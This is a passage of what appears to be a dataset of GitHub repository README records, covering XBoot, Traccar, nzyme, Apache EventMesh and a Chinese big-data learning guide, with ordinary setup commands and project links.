数据库,配置文件已开启ddl自动生成表结构但无初始数据,请记得运行导入xboot.sql文件(当报错找不到Quartz相关表时请设置数据库忽略大小写或额外重新导入quartz.sql) -- 修改配置文件 `application.yml` 相应配置,其中有详细注释,所有配置只需在这里修改 -- 编译器中启动运行 `XbootApplication.java` 或根目录下执行命令 `mvn spring-boot:run` 默认端口8888 访问接口文档 `http://localhost:8888/doc.html` 说明启动成功 管理员账密admin|123456 -- 前台页面请启动基于Vue的 [xboot-front](https://github.com/Exrick/xboot-front) 项目,并修改其接口代理配置 -> 温馨提示:若更新代码后报错,请记得更新sql并清空Redis缓存 -### 开发指南及相关技术栈文档 -- [项目基本配置和使用相关技术栈文档【必读】](https://github.com/Exrick/x-boot/wiki/%E9%A1%B9%E7%9B%AE%E5%9F%BA%E6%9C%AC%E9%85%8D%E7%BD%AE%E5%92%8C%E4%BD%BF%E7%94%A8%E7%9B%B8%E5%85%B3%E6%8A%80%E6%9C%AF%E6%A0%88%E6%96%87%E6%A1%A3%E3%80%90%E5%BF%85%E8%AF%BB%E3%80%91) -- [如何使用XBoot后端在30秒内开发出增删改接口](https://github.com/Exrick/x-boot/wiki/%E5%A6%82%E4%BD%95%E4%BD%BF%E7%94%A8XBoot%E5%90%8E%E7%AB%AF%E5%9C%A830%E7%A7%92%E5%86%85%E5%BC%80%E5%8F%91%E5%87%BA%E5%A2%9E%E5%88%A0%E6%94%B9%E6%8E%A5%E5%8F%A3) -- [具体XBoot增删改文档示例](https://github.com/Exrick/x-boot/wiki/CRUD) -- 完整版 - - [第三方社交账号登录配置](https://github.com/Exrick/x-boot/wiki/%E7%AC%AC%E4%B8%89%E6%96%B9%E7%A4%BE%E4%BA%A4%E8%B4%A6%E5%8F%B7%E7%99%BB%E5%BD%95%E9%85%8D%E7%BD%AE) - - [短信登录配置](https://github.com/Exrick/x-boot/wiki/%E7%9F%AD%E4%BF%A1%E7%99%BB%E5%BD%95%E9%85%8D%E7%BD%AE) - - [Vaptcha人机验证码配置使用](https://github.com/Exrick/x-boot/wiki/vaptcha%E4%BA%BA%E6%9C%BA%E9%AA%8C%E8%AF%81%E7%A0%81%E9%85%8D%E7%BD%AE%E4%BD%BF%E7%94%A8) - - [Activiti工作流开发说明](https://github.com/Exrick/x-boot/wiki/Activiti%E5%B7%A5%E4%BD%9C%E6%B5%81%E5%BC%80%E5%8F%91%E8%AF%B4%E6%98%8E) - -### [分布式扩展](https://github.com/alibaba/dubbo-spring-boot-starter/blob/master/README_zh.md) - -### XBoot后端学习分享(更新中) -1. [Spring Boot 2.x 区别总结](https://github.com/Exrick/x-boot/wiki/SpringBoot2.x%E5%8C%BA%E5%88%AB%E6%80%BB%E7%BB%93) - -2. [Spring Security整合JWT](https://github.com/Exrick/x-boot/wiki/SpringSecurity%E6%95%B4%E5%90%88JWT) - -3. [Spring Security实现动态数据库权限管理](https://github.com/Exrick/x-boot/wiki/SpringSecurity%E5%8A%A8%E6%80%81%E6%9D%83%E9%99%90%E7%AE%A1%E7%90%86) - -4. [Spring Boot 2.x整合Quartz](https://github.com/Exrick/x-boot/wiki/Spring-Boot-2.x%E6%95%B4%E5%90%88Quartz) - -5. [基于Websocket实现发送消息后右上角消息图标红点实时显示](https://github.com/Exrick/x-boot/wiki/%E5%9F%BA%E4%BA%8EWebsocket%E5%AE%9E%E7%8E%B0%E5%8F%91%E9%80%81%E6%B6%88%E6%81%AF%E5%90%8E%E5%8F%B3%E4%B8%8A%E8%A7%92%E6%B6%88%E6%81%AF%E5%9B%BE%E6%A0%87%E7%BA%A2%E7%82%B9%E5%AE%9E%E6%97%B6%E6%98%BE%E7%A4%BA) - -6. [Spring Boot 2.x整合Activiti工作流以及模型设计器](https://github.com/Exrick/x-boot/wiki/Spring-Boot-2.x%E6%95%B4%E5%90%88Activiti%E5%B7%A5%E4%BD%9C%E6%B5%81%E4%BB%A5%E5%8F%8A%E6%A8%A1%E5%9E%8B%E8%AE%BE%E8%AE%A1%E5%99%A8) -### Docker下后端集群部署(更新中) - -> 前端集群部署请跳转至[xboot-front](https://github.com/Exrick/xboot-front)项目查看 - -1.[Docker的安装与常用命令](https://github.com/Exrick/x-boot/wiki/Docker%E7%9A%84%E5%AE%89%E8%A3%85%E4%B8%8E%E5%B8%B8%E7%94%A8%E5%91%BD%E4%BB%A4) - -2.基于PXC架构Mysql数据库集群搭建 - -3.Redis集群搭建 - -4.Elasticsearch集群搭建 - -5.XBoot后端集群部署 - -### 商用授权 -- 个人学习使用遵循GPL开源协议 -- 商用需联系作者授权 - -### 作者其他项目推荐 -- [XMall微信小程序APP前端 现已开源!](https://github.com/Exrick/xmall-weapp) - - [![WX20190924-234416@2x.png](https://s2.ax1x.com/2019/10/06/ucEsBD.md.png)](https://www.bilibili.com/video/av70226175) - -- [XMall:基于SOA架构的分布式电商购物商城](https://github.com/Exrick/xmall) - - ![](https://ooo.0o0.ooo/2018/07/22/5b54615b95788.jpg) - -- [XPay个人免签收款支付系统](https://github.com/Exrick/xpay) - -- 机器学习笔记 - - [Machine-Learning](https://github.com/Exrick/Machine-Learning) - -### 技术疑问交流 -- QQ交流群 `475743731(付费)`,可获取各项目详细图文文档、疑问解答 [![](http://pub.idqqimg.com/wpa/images/group.png)](http://shang.qq.com/wpa/qunwpa?idkey=7b60cec12ba93ebed7568b0a63f22e6e034c0d1df33125ac43ed753342ec6ce7) -- 免费交流群 `562962309` [![](http://pub.idqqimg.com/wpa/images/group.png)](http://shang.qq.com/wpa/qunwpa?idkey=52f6003e230b26addeed0ba6cf343fcf3ba5d97829d17f5b8fa5b151dba7e842) -- 作者博客:[http://blog.exrick.cn](http://blog.exrick.cn) -### [捐赠](http://xpay.exrick.cn/pay)",0 -traccar/traccar,Traccar GPS Tracking System,2012-04-16T08:33:49Z,,"# [Traccar](https://www.traccar.org) - -## Overview - -Traccar is an open source GPS tracking system. This repository contains Java-based back-end service. It supports more than 200 GPS protocols and more than 2000 models of GPS tracking devices. Traccar can be used with any major SQL database system. It also provides easy to use [REST API](https://www.traccar.org/traccar-api/). - -Other parts of Traccar solution include: - -- [Traccar web app](https://github.com/traccar/traccar-web) -- [Traccar Manager Android app](https://github.com/traccar/traccar-manager-android) -- [Traccar Manager iOS app](https://github.com/traccar/traccar-manager-ios) - -There is also a set of mobile apps that you can use for tracking mobile devices: - -- [Traccar Client Android app](https://github.com/traccar/traccar-client-android) -- [Traccar Client iOS app](https://github.com/traccar/traccar-client-ios) - -## Features - -Some of the available features include: - -- Real-time GPS tracking -- Driver behaviour monitoring -- Detailed and summary reports -- Geofencing functionality -- Alarms and notifications -- Account and device management -- Email and SMS support - -## Build - -Please read [build from source documentation](https://www.traccar.org/build/) on the official website. - -## Team - -- Anton Tananaev ([anton@traccar.org](mailto:anton@traccar.org)) -- Andrey Kunitsyn ([andrey@traccar.org](mailto:andrey@traccar.org)) - -## License - - Apache License, Version 2.0 - - Licensed under the Apache License, Version 2.0 (the ""License""); - you may not use this file except in compliance with the License. - You may obtain a copy of the License at - - http://www.apache.org/licenses/LICENSE-2.0 - - Unless required by applicable law or agreed to in writing, software - distributed under the License is distributed on an ""AS IS"" BASIS, - WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - See the License for the specific language governing permissions and - limitations under the License. -",0 -nzymedefense/nzyme,Network Defense System.,2016-11-11T22:06:03Z,,"# nzyme - Network Defense System - -[![Codecov](https://img.shields.io/codecov/c/github/lennartkoopmann/nzyme.svg)](https://codecov.io/gh/lennartkoopmann/nzyme/) -[![License](https://img.shields.io/badge/license-SSPL-brightgreen)](http://www.mongodb.com/licensing/server-side-public-license) - -Learn more at https://www.nzyme.org/. - -**Version 2.0.0 of nzyme is currently in development. The previous website for v1.x is archived [here](https://v1.nzyme.org/).** - -## Contributing - -There are many ways to contribute and all community interaction is absolutely welcome: - -* Open an issue for any kind of bug you think you have found. -* Open an issue for anything that was confusing to you. Bad, missing or confusing documentation is considered a bug. -* Open a Pull Request for a new feature or a bugfix. It is a good idea to get in contact first to make sure that it fits the roadmap and has a chance to be merged. -* Write documentation. -* Write a blog post. -* Help a user in the issue tracker or the IRC channel (#nzyme on FreeNode.) -* Get in contact and say how you use it or what would be a cool addition. -* Tell the world. - -Please be aware of the [Code of Conduct](CODE_OF_CONDUCT.md) that will be enforced across all channels and platforms. - -## Legal notice - -Make sure to comply with local laws, especially with regards to wiretapping, when running nzyme. Note that nzyme is never decrypting any data but only reading unencrypted data. -",0 -apache/eventmesh,EventMesh is a new generation serverless event middleware for building distributed event-driven applications.,2019-09-16T03:04:56Z,,"
- -

- -
- -[![CI status](https://img.shields.io/github/actions/workflow/status/apache/eventmesh/ci.yml?logo=github&style=for-the-badge)](https://github.com/apache/eventmesh/actions/workflows/ci.yml) -[![CodeCov](https://img.shields.io/codecov/c/gh/apache/eventmesh/master?logo=codecov&style=for-the-badge)](https://codecov.io/gh/apache/eventmesh) -[![Code Quality: Java](https://img.shields.io/lgtm/grade/java/g/apache/eventmesh.svg?logo=lgtm&logoWidth=18&style=for-the-badge)](https://lgtm.com/projects/g/apache/eventmesh/context:java) -[![Total Alerts](https://img.shields.io/lgtm/alerts/g/apache/eventmesh.svg?logo=lgtm&logoWidth=18&style=for-the-badge)](https://lgtm.com/projects/g/apache/eventmesh/alerts/) - -[![License](https://img.shields.io/github/license/apache/eventmesh?style=for-the-badge)](https://www.apache.org/licenses/LICENSE-2.0.html) -[![GitHub Release](https://img.shields.io/github/v/release/apache/eventmesh?style=for-the-badge)](https://github.com/apache/eventmesh/releases) -[![Slack Status](https://img.shields.io/badge/slack-join_chat-blue.svg?logo=slack&style=for-the-badge)](https://join.slack.com/t/the-asf/shared_invite/zt-1y375qcox-UW1898e4kZE_pqrNsrBM2g) - - -[📦 Documentation](https://eventmesh.apache.org/docs/introduction) | -[📔 Examples](https://github.com/apache/eventmesh/tree/master/eventmesh-examples) | -[⚙️ Roadmap](https://eventmesh.apache.org/docs/roadmap) | -[🌐 简体中文](README.zh-CN.md) -
- - -# Apache EventMesh - -**Apache EventMesh** is a new generation serverless event middleware for building distributed [event-driven](https://en.wikipedia.org/wiki/Event-driven_architecture) applications. - -### EventMesh Architecture - -![EventMesh Architecture](resources/eventmesh-architecture-4.png) - -### EventMesh Dashboard - -![EventMesh Dashboard](resources/dashboard.png) - -## Features - -Apache EventMesh has a vast amount of features to help users achieve their goals. Let us share with you some of the key features EventMesh has to offer: - -- Built around the [CloudEvents](https://cloudevents.io) specification. -- Rapidty extendsible interconnector layer [connectors](https://github.com/apache/eventmesh/tree/master/eventmesh-connectors) using [openConnect](https://github.com/apache/eventmesh/tree/master/eventmesh-openconnect) such as the source or sink of Saas, CloudService, and Database etc. -- Rapidty extendsible storage layer such as [Apache RocketMQ](https://rocketmq.apache.org), [Apache Kafka](https://kafka.apache.org), [Apache Pulsar](https://pulsar.apache.org), [RabbitMQ](https://rabbitmq.com), [Redis](https://redis.io). -- Rapidty extendsible meta such as [Consul](https://consulproject.org/en/), [Nacos](https://nacos.io), [ETCD](https://etcd.io) and [Zookeeper](https://zookeeper.apache.org/). -- Guaranteed at-least-once delivery. -- Deliver events between multiple EventMesh deployments. -- Event schema management by catalog service. -- Powerful event orchestration by [Serverless workflow](https://serverlessworkflow.io/) engine. -- Powerful event filtering and transformation. -- Rapid, seamless scalability. -- Easy Function develop and framework integration. - -## Roadmap - -Please go to the [roadmap](https://eventmesh.apache.org/docs/roadmap) to get the release history and new features of Apache EventMesh. - -## Subprojects - -- [EventMesh-site](https://github.com/apache/eventmesh-site): Apache official website resources for EventMesh. -- [EventMesh-workflow](https://github.com/apache/eventmesh-workflow): Serverless workflow runtime for event Orchestration on EventMesh. -- [EventMesh-dashboard](https://github.com/apache/eventmesh-dashboard): Operation and maintenance console of EventMesh. -- [EventMesh-catalog](https://github.com/apache/eventmesh-catalog): Catalog service for event schema management using AsyncAPI. -- [EventMesh-go](https://github.com/apache/eventmesh-go): A go implementation for EventMesh runtime. - -## Quick start - -This section of the guide will show you the steps to deploy EventMesh from [Local](#run-eventmesh-runtime-locally), [Docker](#run-eventmesh-runtime-in-docker), [K8s](#run-eventmesh-runtime-in-kubernetes). - -This section guides the launch of EventMesh according to the default configuration, if you need more detailed EventMesh deployment steps, please visit the [EventMesh official document](https://eventmesh.apache.org/docs/introduction). - -### Deployment Event Store - -> EventMesh supports [multiple Event Stores](https://eventmesh.apache.org/docs/roadmap#event-store-implementation-status), the default storage mode is `standalone`, and does not rely on other event stores as layers. - -### Run EventMesh Runtime locally - -#### 1. Download EventMesh - -Download the latest version of the Binary Distribution from the [EventMesh Download](https://eventmesh.apache.org/download/) page and extract it: - -```shell -wget https://dlcdn.apache.org/eventmesh/1.10.0/apache-eventmesh-1.10.0-bin.tar.gz -tar -xvzf apache-eventmesh-1.10.0-bin.tar.gz -cd apache-eventmesh-1.10.0 -``` - -#### 2. Run EventMesh - -Execute the `start.sh` script to start the EventMesh Runtime server. - -```shell -bash bin/start.sh -``` - -View the output log: - -```shell -tail -n 50 -f logs/eventmesh.out -``` - -When the log output shows server `state:RUNNING`, it means EventMesh Runtime has started successfully. - -You can stop the run with the following command: - -```shell -bash bin/stop.sh -``` - -When the script prints `shutdown server ok!`, it means EventMesh Runtime has stopped. - -### Run EventMesh Runtime in Docker - -#### 1. Pull EventMesh Image - -Use the following command line to download the latest version of [EventMesh](https://hub.docker.com/r/apache/eventmesh): - -```shell -sudo docker pull apache/eventmesh:latest -``` - -#### 2. Run and Manage EventMesh Container - -Use the following command to start the EventMesh container: - -```shell -sudo docker run -d --name eventmesh -p 10000:10000 -p 10105:10105 -p 10205:10205 -p 10106:10106 -t apache/eventmesh:latest -``` - - -Enter the container: - -```shell -sudo docker exec -it eventmesh /bin/bash -``` - -view the log: - -```shell -cd logs -tail -n 50 -f eventmesh.out -``` - -### Run EventMesh Runtime in Kubernetes - -#### 1. Deploy operator - -Run the following commands(To delete a deployment, simply replace `deploy` with `undeploy`): - -```shell -$ cd eventmesh-operator && make deploy -``` - -Run `kubectl get pods` 、`kubectl get crd | grep eventmesh-operator.eventmesh`to see the status of the deployed eventmesh-operator. - -```shell -$ kubectl get pods -NAME READY STATUS RESTARTS AGE -eventmesh-operator-59c59f4f7b-nmmlm 1/1 Running 0 20s - -$ kubectl get crd | grep eventmesh-operator.eventmesh -connectors.eventmesh-operator.eventmesh 2024-01-10T02:40:27Z -runtimes.eventmesh-operator.eventmesh 2024-01-10T02:40:27Z -``` - -#### 2. Deploy EventMesh Runtime - -Execute the following command to deploy runtime, connector-rocketmq (To delete, simply replace `create` with `delete`): - -```shell -$ make create -``` - -Run `kubectl get pods` to see if the deployment was successful. - -```shell -NAME READY STATUS RESTARTS AGE -connector-rocketmq-0 1/1 Running 0 9s -eventmesh-operator-59c59f4f7b-nmmlm 1/1 Running 0 3m12s -eventmesh-runtime-0-a-0 1/1 Running 0 15s -``` - -## Contributing - -Each contributor has played an important role in promoting the robust development of Apache EventMesh. We sincerely appreciate all contributors who have contributed code and documents. - -- [Contributing Guideline](https://eventmesh.apache.org/community/contribute/contribute) -- [Good First Issues](https://github.com/apache/eventmesh/issues?q=is%3Aopen+is%3Aissue+label%3A%22good+first+issue%22) - -Here is the [List of Contributors](https://github.com/apache/eventmesh/graphs/contributors), thank you all! :) - - - - - - -## CNCF Landscape - -
- - - - -Apache EventMesh enriches the CNCF Cloud Native Landscape. - -
- -## License - -Apache EventMesh is licensed under the [Apache License, Version 2.0](http://www.apache.org/licenses/LICENSE-2.0.html). - -## Community - -| WeChat Assistant | WeChat Public Account | Slack | -|---------------------------------------------------------|--------------------------------------------------------|-----------------------------------------------------------------------------------------------------------------------------------------------------| -| | | [Join Slack Chat](https://join.slack.com/t/the-asf/shared_invite/zt-1y375qcox-UW1898e4kZE_pqrNsrBM2g)(Please open an issue if this link is expired) | - -Bi-weekly meeting : [#Tencent meeting](https://meeting.tencent.com/dm/wes6Erb9ioVV) : 346-6926-0133 - -Bi-weekly meeting record : [bilibili](https://space.bilibili.com/1057662180) - -### Mailing List - -| Name | Description | Subscribe | Unsubscribe | Archive | -|-------------|---------------------------------------------------------|------------------------------------------------------------|----------------------------------------------------------------|----------------------------------------------------------------------------------| -| Users | User discussion | [Subscribe](mailto:users-subscribe@eventmesh.apache.org) | [Unsubscribe](mailto:users-unsubscribe@eventmesh.apache.org) | [Mail Archives](https://lists.apache.org/list.html?users@eventmesh.apache.org) | -| Development | Development discussion (Design Documents, Issues, etc.) | [Subscribe](mailto:dev-subscribe@eventmesh.apache.org) | [Unsubscribe](mailto:dev-unsubscribe@eventmesh.apache.org) | [Mail Archives](https://lists.apache.org/list.html?dev@eventmesh.apache.org) | -| Commits | Commits to related repositories | [Subscribe](mailto:commits-subscribe@eventmesh.apache.org) | [Unsubscribe](mailto:commits-unsubscribe@eventmesh.apache.org) | [Mail Archives](https://lists.apache.org/list.html?commits@eventmesh.apache.org) | -| Issues | Issues or PRs comments and reviews | [Subscribe](mailto:issues-subscribe@eventmesh.apache.org) | [Unsubscribe](mailto:issues-unsubscribe@eventmesh.apache.org) | [Mail Archives](https://lists.apache.org/list.html?issues@eventmesh.apache.org) | -",0 -MoRan1607/BigDataGuide,大数据学习,从零开始学习大数据,包含大数据学习各阶段学习视频、面试资料,2019-11-30T12:02:52Z,,"大数据学习指南 -=== ->大数据学习指南,从零开始学习大数据开发,包含大数据学习各个阶段资汇总 - -## 公众号 -关注我的公众号:**旧时光大数据**,回复相应关键字,获取更多大数据干货、资料
-“大数据学习路线”中我自己看过的视频、文档资料可以直接在公众号获取云盘链接 - -## 更新中。。。 -#### 牛客网面经 -#### 大数据面试题 - -### 《[大数据面试题 V4.0](https://mp.weixin.qq.com/s/NV90886HAQqBRB1hPNiIPQ)》已出,公众号回复:大数据面试题 - -

- -

-

-

- -## 知识星球 - -知识星球内容包括**学习路线**、**学习资料**(根据编程语言(Java、Python、Java+Scala)分了三大版本)、项目(**50+个大数据项目**)、面试题(**700+道真实大数据面试题**、Java基础、计算机网络、Redis)、**1000+篇大数据真实面经**、600+篇Java后端真实面经(已按公司分类)、自己整理的视频学习笔记 - -**[知识星球资料介绍](https://www.yuque.com/vxo919/gyyog3/ohvyc2e38pprcxkn?singleDoc=)** - -

- -

-

-

- -概述 ---- -[大数据简介](https://github.com/Dr11ft/BigDataGuide/blob/master/Docs/%E5%A4%A7%E6%95%B0%E6%8D%AE%E7%AE%80%E4%BB%8B.md) - -[大数据相关岗位介绍](https://github.com/Dr11ft/BigDataGuide/blob/master/Docs/%E5%A4%A7%E6%95%B0%E6%8D%AE%E7%9B%B8%E5%85%B3%E5%B2%97%E4%BD%8D%E4%BB%8B%E7%BB%8D.md) - -大数据学习路线 ---- -学习路线中的视频、文档资料可以关注公众号:旧时光大数据,回复相应关键字获取云盘链接 - -[大数据学习路线(包含自己看过的视频链接)](https://github.com/Dr11ft/BigDataGuide/blob/master/Docs/%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%AD%A6%E4%B9%A0%E8%B7%AF%E7%BA%BF.md) - -编程语言 ---- -编程语言部分建议先JavaSE,Spark和Flink之前学习Scala,如果时间紧迫,就找个Java版的Spark或Flink教程,Python看个人或工作,不过有Java基础,Python会快很多(别问我怎么学,问就是使劲拼命学 [ 吃瓜.jpg ]) -### 一、JavaSE(二选一) -[刘意2019版](https://www.bilibili.com/video/BV1gb411F76B?from=search&seid=16116797084076868427) - -[尚硅谷宋红康版](https://www.bilibili.com/video/BV1Kb411W75N?from=search&seid=9321658006825735818) - -### 二、Scala(二选一) -如果时间短,建议直接看配套Spark的那种三五天的,可以快速了解 - -[韩顺平老师版](https://www.bilibili.com/video/BV1Mp4y1e7B5?from=search&seid=5450215228532207134) - -[清华硕士武晟然老师版](https://www.bilibili.com/video/BV1Mp4y1e7B5?from=search&seid=5450215228532207134) - -### 三、Python -推荐黑马的Python视频,通俗易懂,而且文档比较齐全,有Java基础再看Python的话,上手很快 - -[黑马Python版视频](https://www.bilibili.com/video/BV1C4411A7ej?from=search&seid=11669436417044703145) - -[Python文档and笔记](https://github.com/MoRan1607/BigDataGuide/blob/master/Python/Python%E6%96%87%E6%A1%A3.md) - -Linux ---- -[完全分布式集群搭建文档](https://github.com/Dr11ft/BigDataGuide/blob/master/Hadoop/%E5%88%86%E5%B8%83%E5%BC%8F%E9%9B%86%E7%BE%A4%E6%90%AD%E5%BB%BA.md) - -关于VM、远程登录工具的安装暂时可以参考我的博客,找到相应步骤进行操作即可 - -[集群搭建](https://blog.csdn.net/qq_41544550/category_9458240.html) - -大数据框架组件 ---- -### 一、Hadoop - -  1. [Hadoop——分布式文件管理系统HDFS](https://github.com/Dr11ft/BigDataGuide/blob/master/Hadoop/HDFS.md) -  2. [Hadoop——HDFS的Shell操作](https://github.com/Dr11ft/BigDataGuide/blob/master/Hadoop/HDFS%E7%9A%84Shell%E6%93%8D%E4%BD%9C.md) -  3. [Hadoop——HDFS的Java API操作](https://github.com/Dr11ft/BigDataGuide/blob/master/Hadoop/HDFS%E7%9A%84Java%20API%E6%93%8D%E4%BD%9C.md) -  4. [Hadoop——分布式计算框架MapReduce](https://github.com/Dr11ft/BigDataGuide/blob/master/Hadoop/MapReduce.md) -  5. [Hadoop——MapReduce案例](https://github.com/Dr11ft/BigDataGuide/blob/master/Hadoop/MapReduce%E6%A1%88%E4%BE%8B.md) -  6. [Hadoop——资源调度器YARN](https://github.com/Dr11ft/BigDataGuide/blob/master/Hadoop/YARN.md) -  7. [Hadoop——Hadoop数据压缩](https://github.com/Dr11ft/BigDataGuide/blob/master/Hadoop/Hadoop%E6%95%B0%E6%8D%AE%E5%8E%8B%E7%BC%A9.md) - -### 二、Zookeeper -  1.[Zookeeper——Zookeeper概述](https://github.com/Dr11ft/BigDataGuide/blob/master/Zookeeper/Zookeeper%EF%BC%88%E4%B8%80%EF%BC%89.md) -  2.[Zookeeper——Zookeeper单机和分布式安装](https://github.com/Dr11ft/BigDataGuide/blob/master/Zookeeper/Zookeeper%EF%BC%88%E4%BA%8C%EF%BC%89.md) -  3.[Zookeeper——Zookeeper客户端命令](https://github.com/Dr11ft/BigDataGuide/blob/master/Zookeeper/Zookeeper%EF%BC%88%E4%B8%89%EF%BC%89.md) -  4.[Zookeeper——Zookeeper内部原理](https://github.com/Dr11ft/BigDataGuide/blob/master/Zookeeper/Zookeeper%EF%BC%88%E5%9B%9B%EF%BC%89.md) -  5.[Zookeeper——Zookeeper实战](https://github.com/Dr11ft/BigDataGuide/blob/master/Zookeeper/Zookeeper%EF%BC%88%E4%BA%94%EF%BC%89.md) - -### 三、Hive -  1.[Hive——Hive概述](https://github.com/Dr11ft/BigDataGuide/blob/master/Hive/1%E3%80%81Hive%E6%A6%82%E8%BF%B0.md) -  2.[Hive——Hive数据类型](https://github.com/Dr11ft/BigDataGuide/blob/master/Hive/2%E3%80%81Hive%E6%95%B0%E6%8D%AE%E7%B1%BB%E5%9E%8B.md) -  3.[Hive——Hive DDL数据定义](https://github.com/Dr11ft/BigDataGuide/blob/master/Hive/3%E3%80%81Hive%20DDL%E6%95%B0%E6%8D%AE.md) -  4.[Hive——Hive DML数据操作](https://github.com/Dr11ft/BigDataGuide/blob/master/Hive/4%E3%80%81Hive%20DML%E6%95%B0%E6%8D%AE%E6%93%8D%E4%BD%9C.md) -  5.[Hive——Hive查询](https://github.com/Dr11ft/BigDataGuide/blob/master/Hive/5%E3%80%81Hive%E6%9F%A5%E8%AF%A2.md) -  6.[Hive——Hive函数](https://github.com/MoRan1607/BigDataGuide/blob/master/Hive/6%E3%80%81Hive%E5%87%BD%E6%95%B0.md) -  7.[Hive——Hive压缩和存储](https://github.com/MoRan1607/BigDataGuide/blob/master/Hive/7%E3%80%81Hive%E5%8E%8B%E7%BC%A9%E5%92%8C%E5%AD%98%E5%82%A8.md) -  8.[Hive——Hive实战:统计影音视频网站的常规指标](https://github.com/MoRan1607/BigDataGuide/blob/master/Hive/8%E3%80%81Hive%E5%AE%9E%E6%88%98%EF%BC%9A%E7%BB%9F%E8%AE%A1%E5%BD%B1%E9%9F%B3%E8%A7%86%E9%A2%91%E7%BD%91%E7%AB%99%E7%9A%84%E5%B8%B8%E8%A7%84%E6%8C%87%E6%A0%87.md) -  9.[Hive——Hive分区表和分桶表](https://github.com/MoRan1607/BigDataGuide/blob/master/Hive/9%E3%80%81%E5%88%86%E5%8C%BA%E8%A1%A8%E5%92%8C%E5%88%86%E6%A1%B6%E8%A1%A8.md) -  10.[Hive——Hive调优](https://github.com/MoRan1607/BigDataGuide/blob/master/Hive/10%E3%80%81Hive%E4%BC%81%E4%B8%9A%E7%BA%A7%E8%B0%83%E4%BC%98.md) - -### 四、Flume -  1.[Flume——Flume概述](https://github.com/Dr11ft/BigDataGuide/blob/master/Flume/1%E3%80%81Flume%E6%A6%82%E8%BF%B0.md) -  2.[Flume——Flume实践操作](https://github.com/Dr11ft/BigDataGuide/blob/master/Flume/2%E3%80%81Flume%E5%AE%9E%E8%B7%B5%E6%93%8D%E4%BD%9C.md) -  3.[Flume——Flume案例](https://github.com/Dr11ft/BigDataGuide/blob/master/Flume/3%E3%80%81Flume%E6%A1%88%E4%BE%8B.md) - -### 五、Kafka -  1.[Kafka——Kafka概述](https://github.com/Dr11ft/BigDataGuide/blob/master/Kafka/1%E3%80%81Kafka%E6%A6%82%E8%BF%B0.md) -  2.[Kafka——Kafka深入解析](https://github.com/Dr11ft/BigDataGuide/blob/master/Kafka/2%E3%80%81Kafka%E6%B7%B1%E5%85%A5%E8%A7%A3%E6%9E%90.md) -  3.[Kafka——Kafka API操作实践](https://github.com/Dr11ft/BigDataGuide/blob/master/Kafka/3%E3%80%81Kafka%20API%E6%93%8D%E4%BD%9C%E5%AE%9E%E8%B7%B5.md) -  3.[Kafka——Kafka对接Flume实践](https://github.com/Dr11ft/BigDataGuide/blob/master/Kafka/4%E3%80%81Flume%E5%AF%B9%E6%8E%A5Kafka%E5%AE%9E%E8%B7%B5%E6%93%8D%E4%BD%9C.md) - -### 六、HBase -  1.[HBase——HBase概述](https://github.com/Dr11ft/BigDataGuide/blob/master/HBase/1%E3%80%81HBase%E6%A6%82%E8%BF%B0.md) -  2.[HBase——HBase数据结构](https://github.com/Dr11ft/BigDataGuide/blob/master/HBase/2%E3%80%81HBase%E6%95%B0%E6%8D%AE%E7%BB%93%E6%9E%84.md) -  3.[HBase——HBase Shell操作](https://github.com/Dr11ft/BigDataGuide/blob/master/HBase/3%E3%80%81HBase%20Shell%E6%93%8D%E4%BD%9C.md) -  4.[HBase——HBase API实践操作](https://github.com/Dr11ft/BigDataGuide/blob/master/HBase/4%E3%80%81HBase%20API%E5%AE%9E%E8%B7%B5%E6%93%8D%E4%BD%9C.md) - -### 七、Spark -#### Spark基础 -  1.[Spark基础——Spark的诞生](https://github.com/Dr11ft/BigDataGuide/blob/master/Spark/1%E3%80%81Spark%E7%9A%84%E8%AF%9E%E7%94%9F.md) -  2.[Spark基础——Spark概述](https://github.com/Dr11ft/BigDataGuide/blob/master/Spark/2%E3%80%81Spark%E6%A6%82%E8%BF%B0.md) -  3.[Spark基础——Spark运行模式](https://github.com/Dr11ft/BigDataGuide/blob/master/Spark/3%E3%80%81Spark%E8%BF%90%E8%A1%8C%E6%A8%A1%E5%BC%8F.md) -  4.[Spark基础——案例实践](https://github.com/Dr11ft/BigDataGuide/blob/master/Spark/2%E3%80%81Spark%E6%A6%82%E8%BF%B0.md) -#### Spark Core -  1.[Spark Core——RDD概述](https://github.com/Dr11ft/BigDataGuide/blob/master/Spark/Spark%20Core/1%E3%80%81RDD%E6%A6%82%E8%BF%B0.md) -  2.[Spark Core——RDD编程(一)](https://github.com/Dr11ft/BigDataGuide/blob/master/Spark/Spark%20Core/2%E3%80%81RDD%E7%BC%96%E7%A8%8B%EF%BC%88%E4%B8%80%EF%BC%89.md) -  3.[Spark Core——RDD编程(二)](https://github.com/Dr11ft/BigDataGuide/blob/master/Spark/Spark%20Core/3%E3%80%81RDD%E7%BC%96%E7%A8%8B%EF%BC%882%EF%BC%89.md) -  4.[Spark Core——键值对RDD数据分区器](https://github.com/Dr11ft/BigDataGuide/blob/master/Spark/Spark%20Core/4%E3%80%81%E9%94%AE%E5%80%BC%E5%AF%B9RDD%E6%95%B0%E6%8D%AE%E5%88%86%E5%8C%BA%E5%99%A8.md) -  5.[Spark Core——数据读取与保存](https://github.com/Dr11ft/BigDataGuide/blob/master/Spark/Spark%20Core/5%E3%80%81%E6%95%B0%E6%8D%AE%E8%AF%BB%E5%8F%96%E4%B8%8E%E4%BF%9D%E5%AD%98.md) -#### Spark SQL -  1.[Spark SQL——Spaek SQL概述](https://github.com/Dr11ft/BigDataGuide/blob/master/Spark/Spark%20SQL/1%E3%80%81Spark%20SQL%E6%A6%82%E8%BF%B0.md) -  2.[Spark SQL——Spaek SQL编程](https://github.com/Dr11ft/BigDataGuide/blob/master/Spark/Spark%20SQL/2%E3%80%81Spark%20SQL%E7%BC%96%E7%A8%8B.md) -  3.[Spark SQL——Spaek SQL数据的加载与保存](https://github.com/Dr11ft/BigDataGuide/blob/master/Spark/Spark%20SQL/3%E3%80%81Spark%20SQL%E6%95%B0%E6%8D%AE%E7%9A%84%E5%8A%A0%E8%BD%BD%E4%B8%8E%E4%BF%9D%E5%AD%98.md) -  4.[Spark SQL——Spaek SQL实战](https://github.com/Dr11ft/BigDataGuide/blob/master/Spark/Spark%20SQL/4%E3%80%81Spark%20SQL%E5%AE%9E%E6%88%98.md) -#### Spark Streaming -  1.[Spark Streaming——Spark Streaming概述](https://github.com/Dr11ft/BigDataGuide/blob/master/Spark/Spark%20Streaming/1%E3%80%81Spark%20Streaming%E6%A6%82%E8%BF%B0.md) -  2.[Spark 